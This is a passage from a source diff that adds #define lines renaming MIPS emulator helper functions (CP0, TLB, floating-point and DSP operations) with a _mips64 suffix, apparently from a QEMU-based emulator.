helper_msachiu_mips64 +#define helper_mulhi helper_mulhi_mips64 +#define helper_mulhiu helper_mulhiu_mips64 +#define helper_mulshi helper_mulshi_mips64 +#define helper_mulshiu helper_mulshiu_mips64 +#define helper_bitswap helper_bitswap_mips64 +#define helper_ll helper_ll_mips64 +#define helper_sc helper_sc_mips64 +#define helper_swl helper_swl_mips64 +#define helper_swr helper_swr_mips64 +#define helper_lwm helper_lwm_mips64 +#define helper_swm helper_swm_mips64 +#define helper_mfc0_mvpcontrol helper_mfc0_mvpcontrol_mips64 +#define helper_mfc0_mvpconf0 helper_mfc0_mvpconf0_mips64 +#define helper_mfc0_mvpconf1 helper_mfc0_mvpconf1_mips64 +#define helper_mfc0_random helper_mfc0_random_mips64 +#define helper_mfc0_tcstatus helper_mfc0_tcstatus_mips64 +#define helper_mftc0_tcstatus helper_mftc0_tcstatus_mips64 +#define helper_mfc0_tcbind helper_mfc0_tcbind_mips64 +#define helper_mftc0_tcbind helper_mftc0_tcbind_mips64 +#define helper_mfc0_tcrestart helper_mfc0_tcrestart_mips64 +#define helper_mftc0_tcrestart helper_mftc0_tcrestart_mips64 +#define helper_mfc0_tchalt helper_mfc0_tchalt_mips64 +#define helper_mftc0_tchalt helper_mftc0_tchalt_mips64 +#define helper_mfc0_tccontext helper_mfc0_tccontext_mips64 +#define helper_mftc0_tccontext helper_mftc0_tccontext_mips64 +#define helper_mfc0_tcschedule helper_mfc0_tcschedule_mips64 +#define helper_mftc0_tcschedule helper_mftc0_tcschedule_mips64 +#define helper_mfc0_tcschefback helper_mfc0_tcschefback_mips64 +#define helper_mftc0_tcschefback helper_mftc0_tcschefback_mips64 +#define helper_mfc0_count helper_mfc0_count_mips64 +#define helper_mftc0_entryhi helper_mftc0_entryhi_mips64 +#define helper_mftc0_cause helper_mftc0_cause_mips64 +#define helper_mftc0_status helper_mftc0_status_mips64 +#define helper_mfc0_lladdr helper_mfc0_lladdr_mips64 +#define helper_mfc0_watchlo helper_mfc0_watchlo_mips64 +#define helper_mfc0_watchhi helper_mfc0_watchhi_mips64 +#define helper_mfc0_debug helper_mfc0_debug_mips64 +#define 
helper_mftc0_debug helper_mftc0_debug_mips64 +#define helper_mtc0_index helper_mtc0_index_mips64 +#define helper_mtc0_mvpcontrol helper_mtc0_mvpcontrol_mips64 +#define helper_mtc0_vpecontrol helper_mtc0_vpecontrol_mips64 +#define helper_mttc0_vpecontrol helper_mttc0_vpecontrol_mips64 +#define helper_mftc0_vpecontrol helper_mftc0_vpecontrol_mips64 +#define helper_mftc0_vpeconf0 helper_mftc0_vpeconf0_mips64 +#define helper_mtc0_vpeconf0 helper_mtc0_vpeconf0_mips64 +#define helper_mttc0_vpeconf0 helper_mttc0_vpeconf0_mips64 +#define helper_mtc0_vpeconf1 helper_mtc0_vpeconf1_mips64 +#define helper_mtc0_yqmask helper_mtc0_yqmask_mips64 +#define helper_mtc0_vpeopt helper_mtc0_vpeopt_mips64 +#define helper_mtc0_entrylo0 helper_mtc0_entrylo0_mips64 +#define helper_mtc0_tcstatus helper_mtc0_tcstatus_mips64 +#define helper_mttc0_tcstatus helper_mttc0_tcstatus_mips64 +#define helper_mtc0_tcbind helper_mtc0_tcbind_mips64 +#define helper_mttc0_tcbind helper_mttc0_tcbind_mips64 +#define helper_mtc0_tcrestart helper_mtc0_tcrestart_mips64 +#define helper_mttc0_tcrestart helper_mttc0_tcrestart_mips64 +#define helper_mtc0_tchalt helper_mtc0_tchalt_mips64 +#define helper_mttc0_tchalt helper_mttc0_tchalt_mips64 +#define helper_mtc0_tccontext helper_mtc0_tccontext_mips64 +#define helper_mttc0_tccontext helper_mttc0_tccontext_mips64 +#define helper_mtc0_tcschedule helper_mtc0_tcschedule_mips64 +#define helper_mttc0_tcschedule helper_mttc0_tcschedule_mips64 +#define helper_mtc0_tcschefback helper_mtc0_tcschefback_mips64 +#define helper_mttc0_tcschefback helper_mttc0_tcschefback_mips64 +#define helper_mtc0_entrylo1 helper_mtc0_entrylo1_mips64 +#define helper_mtc0_context helper_mtc0_context_mips64 +#define helper_mtc0_pagemask helper_mtc0_pagemask_mips64 +#define helper_mtc0_pagegrain helper_mtc0_pagegrain_mips64 +#define helper_mtc0_wired helper_mtc0_wired_mips64 +#define helper_mtc0_srsconf0 helper_mtc0_srsconf0_mips64 +#define helper_mtc0_srsconf1 helper_mtc0_srsconf1_mips64 +#define 
helper_mtc0_srsconf2 helper_mtc0_srsconf2_mips64 +#define helper_mtc0_srsconf3 helper_mtc0_srsconf3_mips64 +#define helper_mtc0_srsconf4 helper_mtc0_srsconf4_mips64 +#define helper_mtc0_hwrena helper_mtc0_hwrena_mips64 +#define helper_mtc0_count helper_mtc0_count_mips64 +#define helper_mtc0_entryhi helper_mtc0_entryhi_mips64 +#define helper_mttc0_entryhi helper_mttc0_entryhi_mips64 +#define helper_mtc0_compare helper_mtc0_compare_mips64 +#define helper_mtc0_status helper_mtc0_status_mips64 +#define helper_mttc0_status helper_mttc0_status_mips64 +#define helper_mtc0_intctl helper_mtc0_intctl_mips64 +#define helper_mtc0_srsctl helper_mtc0_srsctl_mips64 +#define helper_mtc0_cause helper_mtc0_cause_mips64 +#define helper_mttc0_cause helper_mttc0_cause_mips64 +#define helper_mftc0_epc helper_mftc0_epc_mips64 +#define helper_mftc0_ebase helper_mftc0_ebase_mips64 +#define helper_mtc0_ebase helper_mtc0_ebase_mips64 +#define helper_mttc0_ebase helper_mttc0_ebase_mips64 +#define helper_mftc0_configx helper_mftc0_configx_mips64 +#define helper_mtc0_config0 helper_mtc0_config0_mips64 +#define helper_mtc0_config2 helper_mtc0_config2_mips64 +#define helper_mtc0_config4 helper_mtc0_config4_mips64 +#define helper_mtc0_config5 helper_mtc0_config5_mips64 +#define helper_mtc0_lladdr helper_mtc0_lladdr_mips64 +#define helper_mtc0_watchlo helper_mtc0_watchlo_mips64 +#define helper_mtc0_watchhi helper_mtc0_watchhi_mips64 +#define helper_mtc0_xcontext helper_mtc0_xcontext_mips64 +#define helper_mtc0_framemask helper_mtc0_framemask_mips64 +#define helper_mtc0_debug helper_mtc0_debug_mips64 +#define helper_mttc0_debug helper_mttc0_debug_mips64 +#define helper_mtc0_performance0 helper_mtc0_performance0_mips64 +#define helper_mtc0_taglo helper_mtc0_taglo_mips64 +#define helper_mtc0_datalo helper_mtc0_datalo_mips64 +#define helper_mtc0_taghi helper_mtc0_taghi_mips64 +#define helper_mtc0_datahi helper_mtc0_datahi_mips64 +#define helper_mftgpr helper_mftgpr_mips64 +#define helper_mftlo 
helper_mftlo_mips64 +#define helper_mfthi helper_mfthi_mips64 +#define helper_mftacx helper_mftacx_mips64 +#define helper_mftdsp helper_mftdsp_mips64 +#define helper_mttgpr helper_mttgpr_mips64 +#define helper_mttlo helper_mttlo_mips64 +#define helper_mtthi helper_mtthi_mips64 +#define helper_mttacx helper_mttacx_mips64 +#define helper_mttdsp helper_mttdsp_mips64 +#define helper_dmt helper_dmt_mips64 +#define helper_emt helper_emt_mips64 +#define helper_dvpe helper_dvpe_mips64 +#define helper_evpe helper_evpe_mips64 +#define helper_fork helper_fork_mips64 +#define helper_yield helper_yield_mips64 +#define r4k_helper_tlbinv r4k_helper_tlbinv_mips64 +#define r4k_helper_tlbinvf r4k_helper_tlbinvf_mips64 +#define r4k_helper_tlbwi r4k_helper_tlbwi_mips64 +#define r4k_helper_tlbwr r4k_helper_tlbwr_mips64 +#define r4k_helper_tlbp r4k_helper_tlbp_mips64 +#define r4k_helper_tlbr r4k_helper_tlbr_mips64 +#define helper_tlbwi helper_tlbwi_mips64 +#define helper_tlbwr helper_tlbwr_mips64 +#define helper_tlbp helper_tlbp_mips64 +#define helper_tlbr helper_tlbr_mips64 +#define helper_tlbinv helper_tlbinv_mips64 +#define helper_tlbinvf helper_tlbinvf_mips64 +#define helper_di helper_di_mips64 +#define helper_ei helper_ei_mips64 +#define helper_eret helper_eret_mips64 +#define helper_deret helper_deret_mips64 +#define helper_rdhwr_cpunum helper_rdhwr_cpunum_mips64 +#define helper_rdhwr_synci_step helper_rdhwr_synci_step_mips64 +#define helper_rdhwr_cc helper_rdhwr_cc_mips64 +#define helper_rdhwr_ccres helper_rdhwr_ccres_mips64 +#define helper_pmon helper_pmon_mips64 +#define helper_wait helper_wait_mips64 +#define mips_cpu_do_unaligned_access mips_cpu_do_unaligned_access_mips64 +#define mips_cpu_unassigned_access mips_cpu_unassigned_access_mips64 +#define ieee_rm ieee_rm_mips64 +#define helper_cfc1 helper_cfc1_mips64 +#define helper_ctc1 helper_ctc1_mips64 +#define ieee_ex_to_mips ieee_ex_to_mips_mips64 +#define helper_float_sqrt_d helper_float_sqrt_d_mips64 +#define 
helper_float_sqrt_s helper_float_sqrt_s_mips64 +#define helper_float_cvtd_s helper_float_cvtd_s_mips64 +#define helper_float_cvtd_w helper_float_cvtd_w_mips64 +#define helper_float_cvtd_l helper_float_cvtd_l_mips64 +#define helper_float_cvtl_d helper_float_cvtl_d_mips64 +#define helper_float_cvtl_s helper_float_cvtl_s_mips64 +#define helper_float_cvtps_pw helper_float_cvtps_pw_mips64 +#define helper_float_cvtpw_ps helper_float_cvtpw_ps_mips64 +#define helper_float_cvts_d helper_float_cvts_d_mips64 +#define helper_float_cvts_w helper_float_cvts_w_mips64 +#define helper_float_cvts_l helper_float_cvts_l_mips64 +#define helper_float_cvts_pl helper_float_cvts_pl_mips64 +#define helper_float_cvts_pu helper_float_cvts_pu_mips64 +#define helper_float_cvtw_s helper_float_cvtw_s_mips64 +#define helper_float_cvtw_d helper_float_cvtw_d_mips64 +#define helper_float_roundl_d helper_float_roundl_d_mips64 +#define helper_float_roundl_s helper_float_roundl_s_mips64 +#define helper_float_roundw_d helper_float_roundw_d_mips64 +#define helper_float_roundw_s helper_float_roundw_s_mips64 +#define helper_float_truncl_d helper_float_truncl_d_mips64 +#define helper_float_truncl_s helper_float_truncl_s_mips64 +#define helper_float_truncw_d helper_float_truncw_d_mips64 +#define helper_float_truncw_s helper_float_truncw_s_mips64 +#define helper_float_ceill_d helper_float_ceill_d_mips64 +#define helper_float_ceill_s helper_float_ceill_s_mips64 +#define helper_float_ceilw_d helper_float_ceilw_d_mips64 +#define helper_float_ceilw_s helper_float_ceilw_s_mips64 +#define helper_float_floorl_d helper_float_floorl_d_mips64 +#define helper_float_floorl_s helper_float_floorl_s_mips64 +#define helper_float_floorw_d helper_float_floorw_d_mips64 +#define helper_float_floorw_s helper_float_floorw_s_mips64 +#define helper_float_abs_d helper_float_abs_d_mips64 +#define helper_float_abs_s helper_float_abs_s_mips64 +#define helper_float_abs_ps helper_float_abs_ps_mips64 +#define helper_float_chs_d 
helper_float_chs_d_mips64 +#define helper_float_chs_s helper_float_chs_s_mips64 +#define helper_float_chs_ps helper_float_chs_ps_mips64 +#define helper_float_maddf_s helper_float_maddf_s_mips64 +#define helper_float_maddf_d helper_float_maddf_d_mips64 +#define helper_float_msubf_s helper_float_msubf_s_mips64 +#define helper_float_msubf_d helper_float_msubf_d_mips64 +#define helper_float_max_s helper_float_max_s_mips64 +#define helper_float_max_d helper_float_max_d_mips64 +#define helper_float_maxa_s helper_float_maxa_s_mips64 +#define helper_float_maxa_d helper_float_maxa_d_mips64 +#define helper_float_min_s helper_float_min_s_mips64 +#define helper_float_min_d helper_float_min_d_mips64 +#define helper_float_mina_s helper_float_mina_s_mips64 +#define helper_float_mina_d helper_float_mina_d_mips64 +#define helper_float_rint_s helper_float_rint_s_mips64 +#define helper_float_rint_d helper_float_rint_d_mips64 +#define helper_float_class_s helper_float_class_s_mips64 +#define helper_float_class_d helper_float_class_d_mips64 +#define helper_float_recip_d helper_float_recip_d_mips64 +#define helper_float_recip_s helper_float_recip_s_mips64 +#define helper_float_rsqrt_d helper_float_rsqrt_d_mips64 +#define helper_float_rsqrt_s helper_float_rsqrt_s_mips64 +#define helper_float_recip1_d helper_float_recip1_d_mips64 +#define helper_float_recip1_s helper_float_recip1_s_mips64 +#define helper_float_recip1_ps helper_float_recip1_ps_mips64 +#define helper_float_rsqrt1_d helper_float_rsqrt1_d_mips64 +#define helper_float_rsqrt1_s helper_float_rsqrt1_s_mips64 +#define helper_float_rsqrt1_ps helper_float_rsqrt1_ps_mips64 +#define helper_float_add_d helper_float_add_d_mips64 +#define helper_float_add_s helper_float_add_s_mips64 +#define helper_float_add_ps helper_float_add_ps_mips64 +#define helper_float_sub_d helper_float_sub_d_mips64 +#define helper_float_sub_s helper_float_sub_s_mips64 +#define helper_float_sub_ps helper_float_sub_ps_mips64 +#define helper_float_mul_d 
helper_float_mul_d_mips64 +#define helper_float_mul_s helper_float_mul_s_mips64 +#define helper_float_mul_ps helper_float_mul_ps_mips64 +#define helper_float_div_d helper_float_div_d_mips64 +#define helper_float_div_s helper_float_div_s_mips64 +#define helper_float_div_ps helper_float_div_ps_mips64 +#define helper_float_madd_d helper_float_madd_d_mips64 +#define helper_float_madd_s helper_float_madd_s_mips64 +#define helper_float_madd_ps helper_float_madd_ps_mips64 +#define helper_float_msub_d helper_float_msub_d_mips64 +#define helper_float_msub_s helper_float_msub_s_mips64 +#define helper_float_msub_ps helper_float_msub_ps_mips64 +#define helper_float_nmadd_d helper_float_nmadd_d_mips64 +#define helper_float_nmadd_s helper_float_nmadd_s_mips64 +#define helper_float_nmadd_ps helper_float_nmadd_ps_mips64 +#define helper_float_nmsub_d helper_float_nmsub_d_mips64 +#define helper_float_nmsub_s helper_float_nmsub_s_mips64 +#define helper_float_nmsub_ps helper_float_nmsub_ps_mips64 +#define helper_float_recip2_d helper_float_recip2_d_mips64 +#define helper_float_recip2_s helper_float_recip2_s_mips64 +#define helper_float_recip2_ps helper_float_recip2_ps_mips64 +#define helper_float_rsqrt2_d helper_float_rsqrt2_d_mips64 +#define helper_float_rsqrt2_s helper_float_rsqrt2_s_mips64 +#define helper_float_rsqrt2_ps helper_float_rsqrt2_ps_mips64 +#define helper_float_addr_ps helper_float_addr_ps_mips64 +#define helper_float_mulr_ps helper_float_mulr_ps_mips64 +#define helper_cmp_d_f helper_cmp_d_f_mips64 +#define helper_cmpabs_d_f helper_cmpabs_d_f_mips64 +#define helper_cmp_d_un helper_cmp_d_un_mips64 +#define helper_cmpabs_d_un helper_cmpabs_d_un_mips64 +#define helper_cmp_d_eq helper_cmp_d_eq_mips64 +#define helper_cmpabs_d_eq helper_cmpabs_d_eq_mips64 +#define helper_cmp_d_ueq helper_cmp_d_ueq_mips64 +#define helper_cmpabs_d_ueq helper_cmpabs_d_ueq_mips64 +#define helper_cmp_d_olt helper_cmp_d_olt_mips64 +#define helper_cmpabs_d_olt helper_cmpabs_d_olt_mips64 +#define 
helper_cmp_d_ult helper_cmp_d_ult_mips64 +#define helper_cmpabs_d_ult helper_cmpabs_d_ult_mips64 +#define helper_cmp_d_ole helper_cmp_d_ole_mips64 +#define helper_cmpabs_d_ole helper_cmpabs_d_ole_mips64 +#define helper_cmp_d_ule helper_cmp_d_ule_mips64 +#define helper_cmpabs_d_ule helper_cmpabs_d_ule_mips64 +#define helper_cmp_d_sf helper_cmp_d_sf_mips64 +#define helper_cmpabs_d_sf helper_cmpabs_d_sf_mips64 +#define helper_cmp_d_ngle helper_cmp_d_ngle_mips64 +#define helper_cmpabs_d_ngle helper_cmpabs_d_ngle_mips64 +#define helper_cmp_d_seq helper_cmp_d_seq_mips64 +#define helper_cmpabs_d_seq helper_cmpabs_d_seq_mips64 +#define helper_cmp_d_ngl helper_cmp_d_ngl_mips64 +#define helper_cmpabs_d_ngl helper_cmpabs_d_ngl_mips64 +#define helper_cmp_d_lt helper_cmp_d_lt_mips64 +#define helper_cmpabs_d_lt helper_cmpabs_d_lt_mips64 +#define helper_cmp_d_nge helper_cmp_d_nge_mips64 +#define helper_cmpabs_d_nge helper_cmpabs_d_nge_mips64 +#define helper_cmp_d_le helper_cmp_d_le_mips64 +#define helper_cmpabs_d_le helper_cmpabs_d_le_mips64 +#define helper_cmp_d_ngt helper_cmp_d_ngt_mips64 +#define helper_cmpabs_d_ngt helper_cmpabs_d_ngt_mips64 +#define helper_cmp_s_f helper_cmp_s_f_mips64 +#define helper_cmpabs_s_f helper_cmpabs_s_f_mips64 +#define helper_cmp_s_un helper_cmp_s_un_mips64 +#define helper_cmpabs_s_un helper_cmpabs_s_un_mips64 +#define helper_cmp_s_eq helper_cmp_s_eq_mips64 +#define helper_cmpabs_s_eq helper_cmpabs_s_eq_mips64 +#define helper_cmp_s_ueq helper_cmp_s_ueq_mips64 +#define helper_cmpabs_s_ueq helper_cmpabs_s_ueq_mips64 +#define helper_cmp_s_olt helper_cmp_s_olt_mips64 +#define helper_cmpabs_s_olt helper_cmpabs_s_olt_mips64 +#define helper_cmp_s_ult helper_cmp_s_ult_mips64 +#define helper_cmpabs_s_ult helper_cmpabs_s_ult_mips64 +#define helper_cmp_s_ole helper_cmp_s_ole_mips64 +#define helper_cmpabs_s_ole helper_cmpabs_s_ole_mips64 +#define helper_cmp_s_ule helper_cmp_s_ule_mips64 +#define helper_cmpabs_s_ule helper_cmpabs_s_ule_mips64 +#define 
helper_cmp_s_sf helper_cmp_s_sf_mips64 +#define helper_cmpabs_s_sf helper_cmpabs_s_sf_mips64 +#define helper_cmp_s_ngle helper_cmp_s_ngle_mips64 +#define helper_cmpabs_s_ngle helper_cmpabs_s_ngle_mips64 +#define helper_cmp_s_seq helper_cmp_s_seq_mips64 +#define helper_cmpabs_s_seq helper_cmpabs_s_seq_mips64 +#define helper_cmp_s_ngl helper_cmp_s_ngl_mips64 +#define helper_cmpabs_s_ngl helper_cmpabs_s_ngl_mips64 +#define helper_cmp_s_lt helper_cmp_s_lt_mips64 +#define helper_cmpabs_s_lt helper_cmpabs_s_lt_mips64 +#define helper_cmp_s_nge helper_cmp_s_nge_mips64 +#define helper_cmpabs_s_nge helper_cmpabs_s_nge_mips64 +#define helper_cmp_s_le helper_cmp_s_le_mips64 +#define helper_cmpabs_s_le helper_cmpabs_s_le_mips64 +#define helper_cmp_s_ngt helper_cmp_s_ngt_mips64 +#define helper_cmpabs_s_ngt helper_cmpabs_s_ngt_mips64 +#define helper_cmp_ps_f helper_cmp_ps_f_mips64 +#define helper_cmpabs_ps_f helper_cmpabs_ps_f_mips64 +#define helper_cmp_ps_un helper_cmp_ps_un_mips64 +#define helper_cmpabs_ps_un helper_cmpabs_ps_un_mips64 +#define helper_cmp_ps_eq helper_cmp_ps_eq_mips64 +#define helper_cmpabs_ps_eq helper_cmpabs_ps_eq_mips64 +#define helper_cmp_ps_ueq helper_cmp_ps_ueq_mips64 +#define helper_cmpabs_ps_ueq helper_cmpabs_ps_ueq_mips64 +#define helper_cmp_ps_olt helper_cmp_ps_olt_mips64 +#define helper_cmpabs_ps_olt helper_cmpabs_ps_olt_mips64 +#define helper_cmp_ps_ult helper_cmp_ps_ult_mips64 +#define helper_cmpabs_ps_ult helper_cmpabs_ps_ult_mips64 +#define helper_cmp_ps_ole helper_cmp_ps_ole_mips64 +#define helper_cmpabs_ps_ole helper_cmpabs_ps_ole_mips64 +#define helper_cmp_ps_ule helper_cmp_ps_ule_mips64 +#define helper_cmpabs_ps_ule helper_cmpabs_ps_ule_mips64 +#define helper_cmp_ps_sf helper_cmp_ps_sf_mips64 +#define helper_cmpabs_ps_sf helper_cmpabs_ps_sf_mips64 +#define helper_cmp_ps_ngle helper_cmp_ps_ngle_mips64 +#define helper_cmpabs_ps_ngle helper_cmpabs_ps_ngle_mips64 +#define helper_cmp_ps_seq helper_cmp_ps_seq_mips64 +#define helper_cmpabs_ps_seq 
helper_cmpabs_ps_seq_mips64 +#define helper_cmp_ps_ngl helper_cmp_ps_ngl_mips64 +#define helper_cmpabs_ps_ngl helper_cmpabs_ps_ngl_mips64 +#define helper_cmp_ps_lt helper_cmp_ps_lt_mips64 +#define helper_cmpabs_ps_lt helper_cmpabs_ps_lt_mips64 +#define helper_cmp_ps_nge helper_cmp_ps_nge_mips64 +#define helper_cmpabs_ps_nge helper_cmpabs_ps_nge_mips64 +#define helper_cmp_ps_le helper_cmp_ps_le_mips64 +#define helper_cmpabs_ps_le helper_cmpabs_ps_le_mips64 +#define helper_cmp_ps_ngt helper_cmp_ps_ngt_mips64 +#define helper_cmpabs_ps_ngt helper_cmpabs_ps_ngt_mips64 +#define helper_r6_cmp_d_af helper_r6_cmp_d_af_mips64 +#define helper_r6_cmp_d_un helper_r6_cmp_d_un_mips64 +#define helper_r6_cmp_d_eq helper_r6_cmp_d_eq_mips64 +#define helper_r6_cmp_d_ueq helper_r6_cmp_d_ueq_mips64 +#define helper_r6_cmp_d_lt helper_r6_cmp_d_lt_mips64 +#define helper_r6_cmp_d_ult helper_r6_cmp_d_ult_mips64 +#define helper_r6_cmp_d_le helper_r6_cmp_d_le_mips64 +#define helper_r6_cmp_d_ule helper_r6_cmp_d_ule_mips64 +#define helper_r6_cmp_d_saf helper_r6_cmp_d_saf_mips64 +#define helper_r6_cmp_d_sun helper_r6_cmp_d_sun_mips64 +#define helper_r6_cmp_d_seq helper_r6_cmp_d_seq_mips64 +#define helper_r6_cmp_d_sueq helper_r6_cmp_d_sueq_mips64 +#define helper_r6_cmp_d_slt helper_r6_cmp_d_slt_mips64 +#define helper_r6_cmp_d_sult helper_r6_cmp_d_sult_mips64 +#define helper_r6_cmp_d_sle helper_r6_cmp_d_sle_mips64 +#define helper_r6_cmp_d_sule helper_r6_cmp_d_sule_mips64 +#define helper_r6_cmp_d_or helper_r6_cmp_d_or_mips64 +#define helper_r6_cmp_d_une helper_r6_cmp_d_une_mips64 +#define helper_r6_cmp_d_ne helper_r6_cmp_d_ne_mips64 +#define helper_r6_cmp_d_sor helper_r6_cmp_d_sor_mips64 +#define helper_r6_cmp_d_sune helper_r6_cmp_d_sune_mips64 +#define helper_r6_cmp_d_sne helper_r6_cmp_d_sne_mips64 +#define helper_r6_cmp_s_af helper_r6_cmp_s_af_mips64 +#define helper_r6_cmp_s_un helper_r6_cmp_s_un_mips64 +#define helper_r6_cmp_s_eq helper_r6_cmp_s_eq_mips64 +#define helper_r6_cmp_s_ueq 
helper_r6_cmp_s_ueq_mips64 +#define helper_r6_cmp_s_lt helper_r6_cmp_s_lt_mips64 +#define helper_r6_cmp_s_ult helper_r6_cmp_s_ult_mips64 +#define helper_r6_cmp_s_le helper_r6_cmp_s_le_mips64 +#define helper_r6_cmp_s_ule helper_r6_cmp_s_ule_mips64 +#define helper_r6_cmp_s_saf helper_r6_cmp_s_saf_mips64 +#define helper_r6_cmp_s_sun helper_r6_cmp_s_sun_mips64 +#define helper_r6_cmp_s_seq helper_r6_cmp_s_seq_mips64 +#define helper_r6_cmp_s_sueq helper_r6_cmp_s_sueq_mips64 +#define helper_r6_cmp_s_slt helper_r6_cmp_s_slt_mips64 +#define helper_r6_cmp_s_sult helper_r6_cmp_s_sult_mips64 +#define helper_r6_cmp_s_sle helper_r6_cmp_s_sle_mips64 +#define helper_r6_cmp_s_sule helper_r6_cmp_s_sule_mips64 +#define helper_r6_cmp_s_or helper_r6_cmp_s_or_mips64 +#define helper_r6_cmp_s_une helper_r6_cmp_s_une_mips64 +#define helper_r6_cmp_s_ne helper_r6_cmp_s_ne_mips64 +#define helper_r6_cmp_s_sor helper_r6_cmp_s_sor_mips64 +#define helper_r6_cmp_s_sune helper_r6_cmp_s_sune_mips64 +#define helper_r6_cmp_s_sne helper_r6_cmp_s_sne_mips64 +#define helper_msa_ld_df helper_msa_ld_df_mips64 +#define helper_msa_st_df helper_msa_st_df_mips64 +#define no_mmu_map_address no_mmu_map_address_mips64 +#define fixed_mmu_map_address fixed_mmu_map_address_mips64 +#define r4k_map_address r4k_map_address_mips64 +#define mips_cpu_get_phys_page_debug mips_cpu_get_phys_page_debug_mips64 +#define mips_cpu_handle_mmu_fault mips_cpu_handle_mmu_fault_mips64 +#define cpu_mips_translate_address cpu_mips_translate_address_mips64 +#define exception_resume_pc exception_resume_pc_mips64 +#define mips_cpu_do_interrupt mips_cpu_do_interrupt_mips64 +#define mips_cpu_exec_interrupt mips_cpu_exec_interrupt_mips64 +#define r4k_invalidate_tlb r4k_invalidate_tlb_mips64 +#define helper_absq_s_ob helper_absq_s_ob_mips64 +#define helper_absq_s_qh helper_absq_s_qh_mips64 +#define helper_absq_s_pw helper_absq_s_pw_mips64 +#define helper_adduh_ob helper_adduh_ob_mips64 +#define helper_adduh_r_ob helper_adduh_r_ob_mips64 
+#define helper_subuh_ob helper_subuh_ob_mips64 +#define helper_subuh_r_ob helper_subuh_r_ob_mips64 +#define helper_addq_pw helper_addq_pw_mips64 +#define helper_addq_qh helper_addq_qh_mips64 +#define helper_addq_s_pw helper_addq_s_pw_mips64 +#define helper_addq_s_qh helper_addq_s_qh_mips64 +#define helper_addu_ob helper_addu_ob_mips64 +#define helper_addu_qh helper_addu_qh_mips64 +#define helper_addu_s_ob helper_addu_s_ob_mips64 +#define helper_addu_s_qh helper_addu_s_qh_mips64 +#define helper_subq_pw helper_subq_pw_mips64 +#define helper_subq_qh helper_subq_qh_mips64 +#define helper_subq_s_pw helper_subq_s_pw_mips64 +#define helper_subq_s_qh helper_subq_s_qh_mips64 +#define helper_subu_ob helper_subu_ob_mips64 +#define helper_subu_qh helper_subu_qh_mips64 +#define helper_subu_s_ob helper_subu_s_ob_mips64 +#define helper_subu_s_qh helper_subu_s_qh_mips64 +#define helper_raddu_l_ob helper_raddu_l_ob_mips64 +#define helper_precr_ob_qh helper_precr_ob_qh_mips64 +#define helper_precr_sra_qh_pw helper_precr_sra_qh_pw_mips64 +#define helper_precr_sra_r_qh_pw helper_precr_sra_r_qh_pw_mips64 +#define helper_precrq_ob_qh helper_precrq_ob_qh_mips64 +#define helper_precrq_qh_pw helper_precrq_qh_pw_mips64 +#define helper_precrq_rs_qh_pw helper_precrq_rs_qh_pw_mips64 +#define helper_precrq_pw_l helper_precrq_pw_l_mips64 +#define helper_precrqu_s_ob_qh helper_precrqu_s_ob_qh_mips64 +#define helper_preceq_pw_qhl helper_preceq_pw_qhl_mips64 +#define helper_preceq_pw_qhr helper_preceq_pw_qhr_mips64 +#define helper_preceq_pw_qhla helper_preceq_pw_qhla_mips64 +#define helper_preceq_pw_qhra helper_preceq_pw_qhra_mips64 +#define helper_precequ_qh_obl helper_precequ_qh_obl_mips64 +#define helper_precequ_qh_obr helper_precequ_qh_obr_mips64 +#define helper_precequ_qh_obla helper_precequ_qh_obla_mips64 +#define helper_precequ_qh_obra helper_precequ_qh_obra_mips64 +#define helper_preceu_qh_obl helper_preceu_qh_obl_mips64 +#define helper_preceu_qh_obr helper_preceu_qh_obr_mips64 +#define 
helper_preceu_qh_obla helper_preceu_qh_obla_mips64 +#define helper_preceu_qh_obra helper_preceu_qh_obra_mips64 +#define helper_shll_ob helper_shll_ob_mips64 +#define helper_shrl_ob helper_shrl_ob_mips64 +#define helper_shra_ob helper_shra_ob_mips64 +#define helper_shra_r_ob helper_shra_r_ob_mips64 +#define helper_shll_qh helper_shll_qh_mips64 +#define helper_shll_s_qh helper_shll_s_qh_mips64 +#define helper_shrl_qh helper_shrl_qh_mips64 +#define helper_shra_qh helper_shra_qh_mips64 +#define helper_shra_r_qh helper_shra_r_qh_mips64 +#define helper_shll_pw helper_shll_pw_mips64 +#define helper_shll_s_pw helper_shll_s_pw_mips64 +#define helper_shra_pw helper_shra_pw_mips64 +#define helper_shra_r_pw helper_shra_r_pw_mips64 +#define helper_muleu_s_qh_obl helper_muleu_s_qh_obl_mips64 +#define helper_muleu_s_qh_obr helper_muleu_s_qh_obr_mips64 +#define helper_mulq_rs_qh helper_mulq_rs_qh_mips64 +#define helper_muleq_s_pw_qhl helper_muleq_s_pw_qhl_mips64 +#define helper_muleq_s_pw_qhr helper_muleq_s_pw_qhr_mips64 +#define helper_mulsaq_s_w_qh helper_mulsaq_s_w_qh_mips64 +#define helper_dpau_h_obl helper_dpau_h_obl_mips64 +#define helper_dpau_h_obr helper_dpau_h_obr_mips64 +#define helper_dpsu_h_obl helper_dpsu_h_obl_mips64 +#define helper_dpsu_h_obr helper_dpsu_h_obr_mips64 +#define helper_dpa_w_qh helper_dpa_w_qh_mips64 +#define helper_dpaq_s_w_qh helper_dpaq_s_w_qh_mips64 +#define helper_dps_w_qh helper_dps_w_qh_mips64 +#define helper_dpsq_s_w_qh helper_dpsq_s_w_qh_mips64 +#define helper_dpaq_sa_l_pw helper_dpaq_sa_l_pw_mips64 +#define helper_dpsq_sa_l_pw helper_dpsq_sa_l_pw_mips64 +#define helper_mulsaq_s_l_pw helper_mulsaq_s_l_pw_mips64 +#define helper_maq_s_w_qhll helper_maq_s_w_qhll_mips64 +#define helper_maq_s_w_qhlr helper_maq_s_w_qhlr_mips64 +#define helper_maq_s_w_qhrl helper_maq_s_w_qhrl_mips64 +#define helper_maq_s_w_qhrr helper_maq_s_w_qhrr_mips64 +#define helper_maq_sa_w_qhll helper_maq_sa_w_qhll_mips64 +#define helper_maq_sa_w_qhlr 
